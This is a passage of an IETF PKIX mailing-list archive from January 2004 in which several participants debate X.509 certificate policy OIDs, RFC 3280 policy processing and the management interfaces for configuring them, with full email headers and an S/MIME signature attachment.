List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Steve & Steve, >I'll add to your discussion of motivation for policy OIDs, at no >additional charge. That was nice to hear, my funding for external consultants is close to zero :-) >In principle, one could accomplish a similar effect by mandating use >of a different CA name for each distinct policy used by the same CA, >and by propagating knowledge of the policies bound to the names. >However, this is a poor alternative in that it provides no easy way >to convey the policy info when it is replicated by multiple CAs. of >course we don't have enough examples to know if policies will be >replicated, or replicated with caveats, as allowed for by policy >qualifiers, but at least one can understand why it is more attractive >to be able to represent this info via OIDs. This is interesting. I actually fully agree! However, this is a rather different story than having multiple policies per CA, engraving policy OIDs in EE certificates, and become dependent on application dependent policy filtering. >Talk of "trust administrators" just confuses matters. In an >enterprise environment security administrators, are already concerned >about the proper configuration of firewalls, VPNS, anti-virus rule >sets, etc. The management of trust anchors and policies for PKIs is >just another set of security-relevant data that these folks need to >manage. One major attraction of SCVP is that is allows >centralization of this management function for TAs and policy info, >rather than having to do this on every desktop and server. I have no problems with that. I may even "upgrade" my terminology if it makes you happier! >If a vendor of a product that makes use of PKI fails to provide >appropriate management interfaces for dealing with policies, I don't >view that as a condemnation of the facility. If users don't see how >to use the feature, especially in light of a lack of management >interfaces, or confusing management interfaces, that too is not an >indication that the feature is not useful. The perception users >develop of the complexity of a feature is greatly dependent on the >management interfaces provided, not the intrinsic feature. Here we obviously have different views. I think Masaki SHIMAOKA's (albeit also "homebrewed") terms Public PKIs and Private PKIs in his "Memorandum for multi-domain PKI Interoperability" well depicts the scope of the two different approaches. But who wants to be private (=isolated)? The US governments apparently do. Regarding the policy system itself, I find this scheme odd. The path-validation algorithm with respect to policies is the most complex thing I have seen in my entire IT-life (30y+), while a policy itself should according to RFC3280 be expressed as a single OID. That is, anything ranging from, terms and conditions, certificate format, key container characteristics, to RA procedures, are lumped together, making the OID pretty "user-hostile". This deficiency forced the RFC3039 authors to invent a competing policy system, called qcStatements that requires it own policy admin GUI etc, and is supposed to be added as an extra pass after standard path-validation. This don't bode well for the future. Anders Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SLebqa062866; Wed, 28 Jan 2004 13:40:37 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SLebqg062864; Wed, 28 Jan 2004 13:40:37 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from aragorn.bbn.com (aragorn.bbn.com [128.33.0.62]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SLeaic062852 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 13:40:36 -0800 (PST) (envelope-from kent@bbn.com) Received: from [128.33.244.157] (col-dhcp33-244-157.bbn.com [128.33.244.157]) by aragorn.bbn.com (8.12.7/8.12.7) with ESMTP id i0SLeRMB005980; Wed, 28 Jan 2004 16:40:28 -0500 (EST) Mime-Version: 1.0 X-Sender: kent@po2.bbn.com Message-Id: <p06020405bc3db694269c@[128.33.244.157]> In-Reply-To: <4017DE9A.988E5F3A@sun.com> References: <020201c3e4c2$90d03b60$0500a8c0@arport> <p06020403bc3c20462220@[128.89.89.75]> <041c01c3e4eb$a5411820$0500a8c0@arport> <p06020409bc3c3f827415@[128.89.89.75]> <005001c3e50b$9cddac00$0500a8c0@arport> <p06020405bc3d7a1ddfed@[128.33.244.157]> <4017DE9A.988E5F3A@sun.com> Date: Wed, 28 Jan 2004 16:40:07 -0500 To: Steve Hanna <Steve.Hanna@Sun.COM> From: Stephen Kent <kent@bbn.com> Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Cc: ietf-pkix@imc.org Content-Type: text/plain; charset="us-ascii" ; format="flowed" X-Scanned-By: MIMEDefang 2.28 (www . roaringpenguin . com / mimedefang) Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Steve, I'll add to your discussion of motivation for policy OIDs, at no additional charge. In principle, one could accomplish a similar effect by mandating use of a different CA name for each distinct policy used by the same CA, and by propagating knowledge of the policies bound to the names. However, this is a poor alternative in that it provides no easy way to convey the policy info when it is replicated by multiple CAs. of course we don't have enough examples to know if policies will be replicated, or replicated with caveats, as allowed for by policy qualifiers, but at least one can understand why it is more attractive to be able to represent this info via OIDs. Talk of "trust administrators" just confuses matters. In an enterprise environment security administrators, are already concerned about the proper configuration of firewalls, VPNS, anti-virus rule sets, etc. The management of trust anchors and policies for PKIs is just another set of security-relevant data that these folks need to manage. One major attraction of SCVP is that is allows centralization of this management function for TAs and policy info, rather than having to do this on every desktop and server. If a vendor of a product that makes use of PKI fails to provide appropriate management interfaces for dealing with policies, I don't view that as a condemnation of the facility. If users don't see how to use the feature, especially in light of a lack of management interfaces, or confusing management interfaces, that too is not an indication that the feature is not useful. The perception users develop of the complexity of a feature is greatly dependent on the management interfaces provided, not the intrinsic feature. Anyone who has had to deal with programming a VCR, and who then moved to a TiVo or Replay system, can attest to the truth of this observation. Steve Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SKc9rL058775; Wed, 28 Jan 2004 12:38:09 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SKc9vw058774; Wed, 28 Jan 2004 12:38:09 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from nwkea-mail-1.sun.com (nwkea-mail-1.sun.com [192.18.42.13]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SKc7u4058762 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 12:38:07 -0800 (PST) (envelope-from Steve.Hanna@Sun.COM) Received: from phys-bur1-1 ([129.148.13.15]) by nwkea-mail-1.sun.com (8.12.10/8.12.9) with ESMTP id i0SKc3j4002544 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 12:38:03 -0800 (PST) Received: from sun.com (dhcp-ubur02-75-161.East.Sun.COM [129.148.75.161]) by bur-mail2.east.sun.com (iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)) with ESMTPA id <0HS7006KUVZFZD@bur-mail2.east.sun.com> for ietf-pkix@imc.org; Wed, 28 Jan 2004 15:38:03 -0500 (EST) Date: Wed, 28 Jan 2004 15:36:23 -0500 From: Steve Hanna <Steve.Hanna@Sun.COM> Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook To: Anders Rundgren <anders.rundgren@telia.com> Cc: ietf-pkix@imc.org Message-id: <40181D47.3A33C91C@sun.com> MIME-version: 1.0 X-Mailer: Mozilla 4.79 [en] (WinNT; U) Content-type: multipart/signed; boundary=------------msBB6D03F9F0562EC9838DBEB3; micalg=sha1; protocol="application/x-pkcs7-signature" X-Accept-Language: en References: <020201c3e4c2$90d03b60$0500a8c0@arport> <p06020403bc3c20462220@[128.89.89.75]> <041c01c3e4eb$a5411820$0500a8c0@arport> <p06020409bc3c3f827415@[128.89.89.75]> <005001c3e50b$9cddac00$0500a8c0@arport> <p06020405bc3d7a1ddfed@[128.33.244.157]> <4017DE9A.988E5F3A@sun.com> <048501c3e5d6$c23a2b60$0500a8c0@arport> Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> This is a cryptographically signed message in MIME format. --------------msBB6D03F9F0562EC9838DBEB3 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Anders Rundgren wrote: > I'm sorry if you only see this as "fact-free attacks". I apologize for implying that the whole topic was "content-free". That's wrong. There are some good issues here (complexity, UI concerns, etc.). A few of the posts have been insubstantial, but I shouldn't have implied they all were. > I don't think we will agree on this matter, it is better > to explain why we come to different conclusions. If we understand the differing perspectives, we may find a mutually acceptable resolution. > >First, let me address the implicit question > >"Who needs certificate policies? Why bother?" > > That's a perfect start! > > >Some PKI users want to support multiple levels of > >assurance within a single PKI. For example, many > >U.S. government agencies want this. > > Here I maintain that this whish may not have only merits. > The main merits seem to be on the CA-side. > > The alternative to use different PKIs have some benefits as > well, particularly with respect to relying parties. > To have a single trust establising mechanism, should be an > advantage. That this mechanism is compatible with pratically > every PKI-enabled software there is, is another advantage. Having a separate PKI for each certificate policy requires duplicated infrastructure. Also, it prevents cross-certification between organizations with different certificate policies. This will make it more difficult to build large PKIs. So the merits of certificate policies are that they allow one PKI to support multiple levels of assurance and that organizations with different certificate policies can cross-certify. The primary drawback is greater complexity, I believe. > >Now, on to the matter of describing a "compliant management > >interface for the security policy database". Actually, > >David Cross already did this. He explained that the > >Windows Server 2003 IAS Server component allows administrators > >to configure the set of allowed policy OIDs. That's > >equivalent to the "user-initial-policy-set" described > >in RFC 3280. Some users might also want the ability > >to set the other flags specified in 3280 (like > >initial-policy-mapping-inhibit), but the functionality > >described by David is probably sufficient for most purposes. > > This is neither wrong nor completely right as RFC3280- > complient CAs have a myriad of options to select from like > having no policy OIDs, anyPolicy OIDs and various path-validation > input flags making it hard to go beyound the level you described > as "sufficient for most purposes". I don't disagree that this may > indeed be "sufficient", but I don't think that it really matches the > "challenge" requirements as we are talking RFC3280 subsets. I wasn't talking about a subset of RFC 3280. RFC 3280 does not require applications to provide UI for setting all of the parameters specified in RFC 3280. If they're appropriate and relevant to the application, they will be exposed. Otherwise, they probably will not be. All of the features of certificate policy processing per RFC 3280 (including anyPolicy and such) can be supported by providing UI for entering a set of policy OIDs (as described by David) and three boolean flags: initial-policy-mapping-inhibit, initial-explicit-policy, and initial-any-policy-inhibit. It's up to an application developer whether they want to expose these parameters and, if so, how (through a dialog box, a configuration file, or whatever). Clearly this is a "compliant management interface" for specifying all the parameters needed for RFC 3280-compliant policy processing. I claim that I passed the "challenge", but I still decline the "prize". ;-) Thanks, Steve --------------msBB6D03F9F0562EC9838DBEB3 Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" Content-Description: S/MIME Cryptographic Signature MIIIEAYJKoZIhvcNAQcCoIIIATCCB/0CAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC BeMwggKjMIICDKADAgECAgMKVAgwDQYJKoZIhvcNAQEEBQAwgZIxCzAJBgNVBAYTAlpBMRUw EwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNVBAcTCUNhcGUgVG93bjEPMA0GA1UEChMGVGhh d3RlMR0wGwYDVQQLExRDZXJ0aWZpY2F0ZSBTZXJ2aWNlczEoMCYGA1UEAxMfUGVyc29uYWwg RnJlZW1haWwgUlNBIDIwMDAuOC4zMDAeFw0wMzA3MTExMTAxNTFaFw0wNDA3MTAxMTAxNTFa MGgxDjAMBgNVBAQTBUhhbm5hMRUwEwYDVQQqEwxTdGVwaGVuIFJvc3MxGzAZBgNVBAMTElN0 ZXBoZW4gUm9zcyBIYW5uYTEiMCAGCSqGSIb3DQEJARYTc3RldmUuaGFubmFAc3VuLmNvbTCB nzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAoxRk/abMPe7Km2EqpD2FZXzjiBGUHhIdNlIO 9W6mdCQro1xMc+sv+93UuVnIzse+XA67Tqx4g5FdoQ+PI8TQYemYSkTD9GitgU563ypu03UV 86zTJA7u9zVkNv/qL2LRKZ9BXy2Smtet+PUh3nYjMh/ZY7LQxQzmdu1Zunue+yECAwEAAaMw MC4wHgYDVR0RBBcwFYETc3RldmUuaGFubmFAc3VuLmNvbTAMBgNVHRMBAf8EAjAAMA0GCSqG SIb3DQEBBAUAA4GBAHbpX0TKiOFu1vxKc3nAOcUHwoci5kinboYrnjWcl37mMXXbBFntaYRM 9LxpGtHdPm7F4pAviKp8bnFzTU46OyUw3kNUAVGDeWYVQC76f0dDZdA313Tn88UZYa+N6O8W bO8wjKA2vg+yx79WXJCFDu+TpsG/28NKPdH42w8LEOVHMIIDODCCAqGgAwIBAgIQZkVyt8x0 9c9jdkWE0C6RATANBgkqhkiG9w0BAQQFADCB0TELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdl c3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2FwZSBUb3duMRowGAYDVQQKExFUaGF3dGUgQ29uc3Vs dGluZzEoMCYGA1UECxMfQ2VydGlmaWNhdGlvbiBTZXJ2aWNlcyBEaXZpc2lvbjEkMCIGA1UE AxMbVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIENBMSswKQYJKoZIhvcNAQkBFhxwZXJzb25h bC1mcmVlbWFpbEB0aGF3dGUuY29tMB4XDTAwMDgzMDAwMDAwMFoXDTA0MDgyNzIzNTk1OVow gZIxCzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNVBAcTCUNhcGUg VG93bjEPMA0GA1UEChMGVGhhd3RlMR0wGwYDVQQLExRDZXJ0aWZpY2F0ZSBTZXJ2aWNlczEo MCYGA1UEAxMfUGVyc29uYWwgRnJlZW1haWwgUlNBIDIwMDAuOC4zMDCBnzANBgkqhkiG9w0B AQEFAAOBjQAwgYkCgYEA3jMypmPHCSVFPtJueCdngcXaiBmClw7jRCmKYzUqbXA8+tyu9+50 bzC8M5B/+TRxoKNtmPHDT6Jl2w36S/HW3WGl+YXNVZo1Gp2Sdagnrthy+boC9tewkd4c6avg GAOofENCUFGHgzzwObSbVIoTh/+zm51JZgAtCYnslGvpoWkCAwEAAaNOMEwwKQYDVR0RBCIw IKQeMBwxGjAYBgNVBAMTEVByaXZhdGVMYWJlbDEtMjk3MBIGA1UdEwEB/wQIMAYBAf8CAQAw CwYDVR0PBAQDAgEGMA0GCSqGSIb3DQEBBAUAA4GBADGxS0dd+QFx5fVTbF151j2YwCYTYoEi pxL4IpXoG0m3J3sEObr85vIk65H6vewNKjj3UFWobPcNrUwbvAP0teuiR59sogxYjTFCCRFs sBpp0SsSskBdavl50OouJd2K5PzbDR+dAvNa28o89kTqJmmHf0iezqWf54TYyWJirQXGMYIB 9TCCAfECAQEwgZowgZIxCzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQ BgNVBAcTCUNhcGUgVG93bjEPMA0GA1UEChMGVGhhd3RlMR0wGwYDVQQLExRDZXJ0aWZpY2F0 ZSBTZXJ2aWNlczEoMCYGA1UEAxMfUGVyc29uYWwgRnJlZW1haWwgUlNBIDIwMDAuOC4zMAID ClQIMAkGBSsOAwIaBQCggbEwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkqhkiG9w0B CQUxDxcNMDQwMTI4MjAzNjIzWjAjBgkqhkiG9w0BCQQxFgQUhWH+Y6rCCez9UiV7pL6ENtUK lpswUgYJKoZIhvcNAQkPMUUwQzAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwBwYFKw4D AgcwDQYIKoZIhvcNAwICAUAwDQYIKoZIhvcNAwICASgwDQYJKoZIhvcNAQEBBQAEgYBjbLWz okEARg/qYVyUK0IWtnZ9tbqYzc3IMZl1GpMHZkFJVwicKL/2/Z8bw0qbsuHP+nV5FG6mLG23 d55vVwsYvz6hLd4lR3g/RDZdOCH+wRfJgy7Afnwh6y/PRQQVh0/r+Jwy/KW+x1gNIRgsQMXS bWGcjD1G1tnbYA/Yqnk9MA== --------------msBB6D03F9F0562EC9838DBEB3-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SJlHuP055000; Wed, 28 Jan 2004 11:47:17 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SJlHO6054999; Wed, 28 Jan 2004 11:47:17 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from av7-2-sn1.fre.skanova.net (av7-2-sn1.fre.skanova.net [81.228.11.114]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SJlG59054989 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 11:47:16 -0800 (PST) (envelope-from anders.rundgren@telia.com) Received: by av7-2-sn1.fre.skanova.net (Postfix, from userid 502) id 91DBE37F0D; Wed, 28 Jan 2004 20:47:12 +0100 (CET) Received: from smtp5.hy.skanova.net (smtp5.hy.skanova.net [195.67.199.134]) by av7-2-sn1.fre.skanova.net (Postfix) with ESMTP id 8229B37F06; Wed, 28 Jan 2004 20:47:12 +0100 (CET) Received: from arport (t8o913p100.telia.com [213.64.26.220]) by smtp5.hy.skanova.net (8.12.10/8.12.10) with SMTP id i0SJlA7N014283; Wed, 28 Jan 2004 20:47:11 +0100 (CET) Message-ID: <048501c3e5d6$c23a2b60$0500a8c0@arport> From: "Anders Rundgren" <anders.rundgren@telia.com> To: "Steve Hanna" <Steve.Hanna@Sun.COM> Cc: <ietf-pkix@imc.org> References: <020201c3e4c2$90d03b60$0500a8c0@arport> <p06020403bc3c20462220@[128.89.89.75]> <041c01c3e4eb$a5411820$0500a8c0@arport> <p06020409bc3c3f827415@[128.89.89.75]> <005001c3e50b$9cddac00$0500a8c0@arport> <p06020405bc3d7a1ddfed@[128.33.244.157]> <4017DE9A.988E5F3A@sun.com> Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Date: Wed, 28 Jan 2004 20:41:43 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Hi Steve, I'm sorry if you only see this as "fact-free attacks". I don't think we will agree on this matter, it is better to explain why we come to different conclusions. >First, let me address the implicit question >"Who needs certificate policies? Why bother?" That's a perfect start! >Some PKI users want to support multiple levels of >assurance within a single PKI. For example, many >U.S. government agencies want this. Here I maintain that this whish may not have only merits. The main merits seem to be on the CA-side. The alternative to use different PKIs have some benefits as well, particularly with respect to relying parties. To have a single trust establising mechanism, should be an advantage. That this mechanism is compatible with pratically every PKI-enabled software there is, is another advantage. >To accomplish this, they put a certificate policy extension in >each certificate indicating under which policy orpolicies it was issued. Agreed. >Many PKI users (CAs and relying parties) don't need this. >They can just omit all policy-related extensions from their >certificates and forget about configuring their relying party >software with policy-related parameters. Agreed. >Now, on to the matter of describing a "compliant management >interface for the security policy database". Actually, >David Cross already did this. He explained that the >Windows Server 2003 IAS Server component allows administrators >to configure the set of allowed policy OIDs. That's >equivalent to the "user-initial-policy-set" described >in RFC 3280. Some users might also want the ability >to set the other flags specified in 3280 (like >initial-policy-mapping-inhibit), but the functionality >described by David is probably sufficient for most purposes. This is neither wrong nor completely right as RFC3280- complient CAs have a myriad of options to select from like having no policy OIDs, anyPolicy OIDs and various path-validation input flags making it hard to go beyound the level you described as "sufficient for most purposes". I don't disagree that this may indeed be "sufficient", but I don't think that it really matches the "challenge" requirements as we are talking RFC3280 subsets. To summarize: If your focus is hugh-but-closed PKIs as represented by some US governments you may end-up with one answer, while if you focus on the currently not yet up-and-running many-to-many PKI-using communities (like B2B) where relying parties do not have PKI experts at hand, you may end-up with another answer. A valid question is of course is how these PKIs can ever be interoperable. I have no answer to that. Gateways I guess :-) rgds Anders Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SHProR045456; Wed, 28 Jan 2004 09:25:53 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SHPqaT045455; Wed, 28 Jan 2004 09:25:52 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from host13.websitesource.com (host13.websitesource.com [209.239.35.152]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SHPphw045448 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 09:25:52 -0800 (PST) (envelope-from chokhani@orionsec.com) Received: from wchokhani (dpvc-138-88-161-20.res.east.verizon.net [138.88.161.20]) by host13.websitesource.com (8.12.10/8.12.10) with ESMTP id i0SHPqh2026850 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 12:25:52 -0500 From: "Santosh Chokhani" <chokhani@orionsec.com> To: <ietf-pkix@imc.org> Subject: RE: Setting X.509 Policy Data in IE, IIS, Outlook Date: Wed, 28 Jan 2004 12:25:38 -0500 Message-ID: <023d01c3e5c3$c3d53860$e82b4d0c@hq.orionsec.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 In-Reply-To: <038601c3e5b3$bfd3eeb0$0500a8c0@arport> Importance: Normal Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by above.proper.com id i0SHPqhw045450 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Anders: In order to comply with current 3280, you will not be able to store anything with the trust store. The application will include in the acceptable policy set the policies from each trust anchor domain that are acceptable to the application. -----Original Message----- From: Anders Rundgren [mailto:anders.rundgren@telia.com] Sent: Wednesday, January 28, 2004 10:31 AM To: Santosh Chokhani; ietf-pkix@imc.org Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Santosh, Instead of going for the profound aspects of PKI, you can start at the "newbe" level by answering some simple questions like - How does an RP "trust admin" know what policies a CA support? - If policy settings would be implemented in core systems like CryptoAPI, Java Keystore, CryptLib etc. would that not require that these trust store system would be revised in order to also house policy setting data? Anders ----- Original Message ----- From: "Santosh Chokhani" <chokhani@orionsec.com> To: <ietf-pkix@imc.org> Sent: Wednesday, January 28, 2004 12:58 Subject: RE: Setting X.509 Policy Data in IE, IIS, Outlook Peter: I do not if your reward is punishment or reward, if you speak in plain American English (pardon the parochialism) or Hindi will be glad to tell you how the application can be configured for policy processing or the application can provide the user interface. I also encourage you to read Annex J of X.509 draft. -----Original Message----- From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Peter Gutmann Sent: Tuesday, January 27, 2004 7:29 PM To: anders.rundgren@telia.com; kent@bbn.com Cc: ietf-pkix@imc.org Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Stephen Kent <kent@bbn.com> writes: >>Borrowing from your IPsec complaints: >>A "compliant management interface for the security policy database" >>for X.509 would be fun to review. As far as I can see, the X.509 >>policy mechanisms are flawed to the point where it becomes technically >>infeasible to specify such an interface. But I stay interested if >>anybody dares to challenge that statement with something tangible >>instead of the usual PKI mumbo-jumbo, like "there are many ways to do >>this". > >A challenge with no apparent reward to motivate a response, as usual >... I hereby offer a reward of one (1) bilabial fricative to anyone who can provide a clear technical explanation/description of a policy management interface for X.509, to be paid in full upon delivery of said explanation/description. Peter. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SHECTH044501; Wed, 28 Jan 2004 09:14:12 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SHEC2S044500; Wed, 28 Jan 2004 09:14:12 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from nic.lp.se (nic.lp.se [213.212.3.208]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SHEA5L044477 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 09:14:11 -0800 (PST) (envelope-from levitte@lp.se) Received: from localhost (127.0.0.1) by nic.lp.se (MX V5.3 VnHj) with ESMTP; Wed, 28 Jan 2004 18:14:07 +0100 Date: Wed, 28 Jan 2004 18:14:05 +0100 (CET) Message-ID: <20040128.181405.77048389.levitte@lp.se> To: anders.rundgren@telia.com CC: dcross@microsoft.com, ietf-pkix@imc.org Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook From: Richard Levitte - VMS Whacker <levitte@lp.se> In-Reply-To: <03c801c3e5b9$94ece750$0500a8c0@arport> References: <002601c3e518$848b66d0$0500a8c0@arport> <20040128.164606.101603362.levitte@lp.se> <03c801c3e5b9$94ece750$0500a8c0@arport> X-URL: http://www.lp.se/ X-Waved: dead chicken, GNU emacs 21.3.1, Mew version 4.0.63 X-Mew: See http://www.mew.org/ X-Mailer: Mew version 4.0.63 on Emacs 21.3.1 / Mule 5.0 (SAKAKI) MIME-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> In message <03c801c3e5b9$94ece750$0500a8c0@arport> on Wed, 28 Jan 2004 17:12:51 +0100, "Anders Rundgren" <anders.rundgren@telia.com> said: anders.rundgren> >> Assuming that you added such support to the Windows anders.rundgren> >> trust anchor installation process, I believe you anders.rundgren> >> would run into a little problem: How is the trust anders.rundgren> >> administrator supposed to know what policy OIDs the anders.rundgren> >> CA uses? anders.rundgren> anders.rundgren> >I'm sorry, I'm not sure I understand the question. anders.rundgren> >Did you mean any other OID than what should be found anders.rundgren> >in the CA certificate? anders.rundgren> anders.rundgren> There are no requirements to use policy OIDs at all, anders.rundgren> making the trust admin process rather arbitrary. anders.rundgren> anders.rundgren> Regarding those CAs who use policy OIDs, is there a anders.rundgren> MUST to also specify these at CA-level to make anders.rundgren> path-validation work? Hmm, it seems like there is no requirement for the trust anchor to have any policy OID, at least if I read the path validation algorithm in RFC3280 correctly (someone correct me if I'm wrong). But either way, the answer to your question is the human interface. If you want to have a trust relationship with anyone, it implicitely requires that you talk with someone (you *do* verify fingerprints, don't you?). So when faced with a new CA, your administrator will probably have to call the people at that CA and ask for information, or visit some web site and find it there (provided it can be trusted), or... The thing that disturbs me in these kinds of discussions is the apparent concept of having trust done automagically from the start (it may work automagically after some initial work, but that's different). I've a hard time believing that's possible (I'd be happy to be proven wrong!), at least with current technologies. ----- Please consider sponsoring my work on free software. See http://www.free.lp.se/sponsoring.html for details. -- Richard Levitte | http://richard.levitte.org/ | Tunnlandsv. 3 Levitte Programming | http://www.lp.se/ | S-168 36 Bromma T: +46-708-26 53 44 | | SWEDEN "Price, performance, quality... choose the two you like" Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SGbQ89041600; Wed, 28 Jan 2004 08:37:26 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SGbQcc041599; Wed, 28 Jan 2004 08:37:26 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from nuvirtual2.avalon.net (nuvirtual2.avalon.net [216.137.72.8]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SGbPEo041589 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 08:37:25 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: from localhost (localhost [127.0.0.1]) by nuvirtual2.avalon.net (Postfix) with ESMTP id E2F1AC9EE7; Wed, 28 Jan 2004 10:37:24 -0600 (CST) Received: from nuvirtual2.avalon.net ([127.0.0.1]) by localhost (nuvirtual2.avalon.net [127.0.0.1]) (amavisd-new, port 10024) with LMTP id 70458-05-97; Wed, 28 Jan 2004 10:37:20 -0600 (CST) Received: by nuvirtual2.avalon.net (Postfix, from userid 1002) id 2E9BDC9EED; Wed, 28 Jan 2004 10:21:25 -0600 (CST) Received: by nuvirtual2.avalon.net (Postfix, from userid 1002) id 005F7CA842; Wed, 28 Jan 2004 10:16:31 -0600 (CST) Received: from above.proper.com (above.proper.com [208.184.76.39]) by nuvirtual2.avalon.net (Postfix) with ESMTP id 2C60DCA34F for <kylea@avalon.net>; Wed, 28 Jan 2004 10:12:45 -0600 (CST) Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SG0MP0038335; Wed, 28 Jan 2004 08:00:22 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SG0MIG038334; Wed, 28 Jan 2004 08:00:22 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from smtp.cs.auckland.ac.nz (smtp.cs.auckland.ac.nz [130.216.33.151]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SG0KCC038326 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 08:00:20 -0800 (PST) (envelope-from pgut001@cs.auckland.ac.nz) Received: from cs.auckland.ac.nz (medusa01.cs.auckland.ac.nz [130.216.34.33]) by smtp.cs.auckland.ac.nz (Postfix) with 